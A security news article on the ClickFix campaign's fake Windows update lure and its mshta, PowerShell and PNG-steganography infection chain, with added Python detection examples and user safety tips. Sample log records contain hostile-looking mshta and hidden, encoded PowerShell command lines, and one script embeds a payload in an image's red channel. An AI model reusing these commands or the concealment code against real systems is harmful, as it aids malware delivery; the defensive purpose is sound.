Cybercriminals behind the ongoing ClickFix campaign have adopted a new lure: malware disguised as a Windows update. The campaign has shifted from fake human-verification (CAPTCHA-style) prompts to a full-screen page that closely imitates the real Windows update screen. The risk is that users follow the on-screen instructions without suspicion and infect themselves.
Researchers at Joe Security have observed that ClickFix now displays a fake Windows update screen complete with the familiar progress bar and status messages. The page then tells the user to open the Run box and execute a command; that command silently downloads a malware dropper. The final payload is typically an infostealer that harvests passwords, session cookies and other sensitive data.
The attack does not exploit a software flaw; it relies on the user's trust in Windows updates. When the user executes the pasted command, it launches mshta.exe, a legitimate signed Windows binary (the Microsoft HTML Application host), which connects to a remote server and retrieves a script. To hamper detection and blocking, the attackers hex-encode the URL and rotate the path frequently. The retrieved script in turn runs heavily obfuscated PowerShell, designed to slow down analysts and defeat signature-based scanning.
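As an added illustration (not from Joe Security's report or the original article), the following Python script applies the chain described above to constructed process-creation records modelled loosely on Sysmon Event ID 1 fields. It flags mshta.exe launched with a remote URL and decodes any long hex run in the URL path (the campaign's hex-encoded paths would otherwise hide the file name), flags mshta.exe spawned from explorer.exe as the Run box would do, and flags PowerShell spawned by mshta.exe with hidden or encoded flags. The log layout, host address, paths and the decoded string are all invented for the example.

```python
import re
from typing import Optional

# Constructed sample records in a simplified key=value layout modelled on
# Sysmon Event ID 1 (process creation). Hosts, paths and the hex string are
# invented; 203.0.113.10 is a documentation (TEST-NET-3) address.
SAMPLE_EVENTS = [
    'Image=C:\\Windows\\System32\\mshta.exe ParentImage=C:\\Windows\\explorer.exe '
    'CommandLine="mshta http://203.0.113.10/0x7570646174652e6874613f7631"',
    'Image=C:\\Windows\\System32\\mshta.exe ParentImage=C:\\Windows\\explorer.exe '
    'CommandLine="mshta.exe C:\\ProgramData\\Intel\\update.hta"',
    'Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'ParentImage=C:\\Windows\\System32\\mshta.exe '
    'CommandLine="powershell -w hidden -nop -ep bypass -enc SQBFAFgA"',
    'Image=C:\\Windows\\System32\\notepad.exe ParentImage=C:\\Windows\\explorer.exe '
    'CommandLine="notepad.exe readme.txt"',
]

EVENT_RE = re.compile(
    r'Image=(?P<image>\S+)\s+ParentImage=(?P<parent>\S+)\s+CommandLine="(?P<cmd>.*)"$'
)
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
HEX_RUN_RE = re.compile(r"(?:0x)?([0-9a-fA-F]{8,})")  # 4+ bytes of hex digits
PS_FLAGS = ("-enc", "-w hidden", "-nop", "-ep bypass")


def parse_event(line: str) -> Optional[dict]:
    """Split one record into image, parent (both as bare file names) and command line."""
    m = EVENT_RE.search(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["image"] = ev["image"].rsplit("\\", 1)[-1].lower()
    ev["parent"] = ev["parent"].rsplit("\\", 1)[-1].lower()
    return ev


def decode_hex_segments(url: str) -> list:
    """Decode long hex runs in the URL path that yield printable ASCII.

    Hex-encoding the path keeps the plain file name out of the command line;
    decoding it gives analysts a stable string to pivot on even when the
    path itself is rotated.
    """
    path = url.partition("://")[2].partition("/")[2]
    decoded = []
    for run in HEX_RUN_RE.findall(path):
        if len(run) % 2:
            continue
        raw = bytes.fromhex(run)
        if all(0x20 <= b < 0x7F for b in raw):
            decoded.append(raw.decode("ascii"))
    return decoded


def classify(ev: dict) -> Optional[str]:
    """Return a verdict string for a suspicious record, or None if it looks benign."""
    cmd = ev["cmd"]
    if ev["image"] == "mshta.exe":
        urls = URL_RE.findall(cmd)
        if urls:
            hint = decode_hex_segments(urls[0])
            note = f" (hex path decodes to {hint[0]!r})" if hint else ""
            return f"HIGH: mshta.exe fetching remote content from {urls[0]}{note}"
        if ev["parent"] == "explorer.exe":
            return "MEDIUM: mshta.exe started from explorer.exe (Run box or double-click)"
    if ev["image"] == "powershell.exe" and ev["parent"] == "mshta.exe":
        flags = [f for f in PS_FLAGS if f in cmd.lower()]
        return "HIGH: powershell.exe spawned by mshta.exe with " + ", ".join(flags)
    return None


def scan(lines) -> list:
    """Run every record through the rules; returns (image, verdict) pairs for hits."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        verdict = classify(ev)
        if verdict:
            hits.append((ev["image"], verdict))
    return hits


if __name__ == "__main__":
    for image, verdict in scan(SAMPLE_EVENTS):
        print(f"{image:15} {verdict}")
```

In production the same three rules map directly onto a SIEM query over process-creation telemetry: mshta.exe with an http(s) argument, mshta.exe parented by explorer.exe, and PowerShell parented by mshta.exe. The hex decoding step is worth keeping because the decoded file name often survives across the rotated paths that defeat plain URL blocklists.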
The more sophisticated part of the attack is its use of steganography, which hides malicious data inside seemingly innocuous image files. Here the payload is concealed in the pixel data of a PNG file: the attackers adjust color values, especially in the red channel, so that the pixel bytes encode shellcode. The image still displays normally, and because the file is a valid PNG rather than an executable, traditional file scanners have nothing to match against. The PowerShell stage reads the pixel values back at runtime to reconstruct the shellcode in memory.
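To make the steganography stage concrete, here is an added Python example (not the campaign's code and not from the article) that builds a small RGB PNG with a gradient in the green and blue channels and stores a length-prefixed payload in the red channel, then parses the PNG back and recovers the payload. The payload is a constructed high-entropy byte pattern standing in for shellcode, not executable code. The last function compares per-channel Shannon entropy: a channel packed with code stands out against a smooth gradient, which is one signal a defender can compute over image files pulled from suspicious mshta or PowerShell traffic. The reader handles only the unfiltered scanlines this writer emits; real PNGs use per-row filters that a full decoder must undo first.

```python
import math
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

# Constructed stand-in for a shellcode blob: every byte value twice, so the
# payload has maximal entropy (8 bits/byte). It is NOT executable code.
SAMPLE_PAYLOAD = bytes(range(256)) * 2


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def embed_in_red(payload: bytes, width: int, height: int) -> bytes:
    """Build an 8-bit RGB PNG whose red channel carries a length-prefixed payload."""
    data = struct.pack(">I", len(payload)) + payload
    if len(data) > width * height:
        raise ValueError("payload does not fit in the carrier image")
    rows = []
    for y in range(height):
        row = bytearray([0])  # filter byte 0: scanline stored unfiltered
        for x in range(width):
            i = y * width + x
            gx = (x * 255) // max(width - 1, 1)   # green: horizontal gradient
            gy = (y * 255) // max(height - 1, 1)  # blue: vertical gradient
            red = data[i] if i < len(data) else gx  # unused red pixels mimic the gradient
            row += bytes((red, gx, gy))
        rows.append(bytes(row))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)  # 8-bit RGB
    return (PNG_SIG + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(b"".join(rows)))
            + _chunk(b"IEND", b""))


def _iter_chunks(png: bytes):
    """Yield (type, data) for each chunk, verifying the signature and CRCs."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos + 12 <= len(png):
        (length,) = struct.unpack(">I", png[pos:pos + 4])
        ctype = png[pos + 4:pos + 8]
        data = png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])
        if crc != zlib.crc32(ctype + data) & 0xFFFFFFFF:
            raise ValueError(f"CRC mismatch in {ctype!r} chunk")
        yield ctype, data
        pos += 12 + length
        if ctype == b"IEND":
            break


def channels(png: bytes) -> dict:
    """Return the raw R, G and B planes of an 8-bit RGB PNG with filter-0 rows."""
    width = height = 0
    idat = b""
    for ctype, data in _iter_chunks(png):
        if ctype == b"IHDR":
            width, height, depth, color = struct.unpack(">IIBB", data[:10])
            if depth != 8 or color != 2:
                raise ValueError("this toy reader only handles 8-bit RGB")
        elif ctype == b"IDAT":
            idat += data  # IDAT may be split across several chunks
    raw = zlib.decompress(idat)
    stride = 1 + width * 3
    planes = {"R": bytearray(), "G": bytearray(), "B": bytearray()}
    for y in range(height):
        row = raw[y * stride:(y + 1) * stride]
        if row[0] != 0:
            raise ValueError("filtered scanline; a real decoder must unfilter it")
        planes["R"] += row[1::3]
        planes["G"] += row[2::3]
        planes["B"] += row[3::3]
    return {k: bytes(v) for k, v in planes.items()}


def extract_from_red(png: bytes) -> bytes:
    """Recover the length-prefixed payload from the red channel."""
    reds = channels(png)["R"]
    (n,) = struct.unpack(">I", reds[:4])
    return reds[4:4 + n]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 means uniformly distributed, 0.0 means constant."""
    total = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / total * math.log2(c / total) for c in counts if c)


def channel_entropies(png: bytes) -> dict:
    """Per-channel entropy; a channel packed with code stands out from a gradient."""
    return {k: shannon_entropy(v) for k, v in channels(png).items()}
```

Calling `embed_in_red(SAMPLE_PAYLOAD, 32, 32)` and then `channel_entropies(...)` on the result shows the asymmetry a defender would look for: the green and blue planes of this carrier each hold 32 evenly used values (5.0 bits/byte), while the red plane carrying the payload climbs above 7 bits/byte. Real attackers may spread bytes across channels or use only low-order bits to keep the image looking natural, so entropy is a triage signal, not proof; the reliable detection point remains the PowerShell stage that reads the pixels and injects the result.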
Once reconstructed, the shellcode is injected into a trusted Windows process, such as explorer.exe, using well-known in-memory injection techniques, so no malicious executable has to be written to disk. Recent ClickFix activity has delivered infostealers including LummaC2 and updated versions of Rhadamanthys, both built to harvest credentials while staying quiet.
Key Protective Measures Against ClickFix
To combat the ClickFix campaign and similar threats, users should adopt several precautionary measures:
1. **Avoid Unsolicited Commands**: Never run a command that a website tells you to paste into the Run box, PowerShell or a terminal. Legitimate operating system updates never require commands to be executed from a webpage.
2. **Check Update Sources**: Windows updates should only be accessed via the official Windows Settings app or through trusted system notifications. Any unsolicited pop-up claiming to be an update should be disregarded.
3. **Use Reputable Security Software**: Choose a security suite that detects both file-based and in-memory threats. Because ClickFix payloads are decoded and injected in memory, behavioral detection matters more than traditional file scanning.
4. **Employ a Password Manager**: Password managers can generate strong, unique passwords for each account and autofill information only on legitimate websites, helping to prevent credential theft.
5. **Consider Data Removal Services**: Services that help minimize online exposure can reduce the risk of being targeted by scammers. They request the removal of personal information from data broker sites.
6. **Verify URLs Before Trusting**: Users should scrutinize domain names and ensure they match official sites to avoid falling victim to phishing attempts.
7. **Exit Suspicious Full-Screen Pages**: If a webpage unexpectedly takes over the full screen, users should exit immediately and scan their systems for potential threats.
Kurt “CyberGuy” Knutsson emphasizes that ClickFix relies on user interaction. The threat becomes particularly dangerous when users are prompted to run commands that seem routine. By mimicking trusted interfaces, attackers manipulate users into installing the malware themselves.
Staying informed and cautious is paramount to safeguarding personal information and avoiding falling prey to such cyber threats. For additional information and security tips, users are encouraged to subscribe to the CyberGuy Report.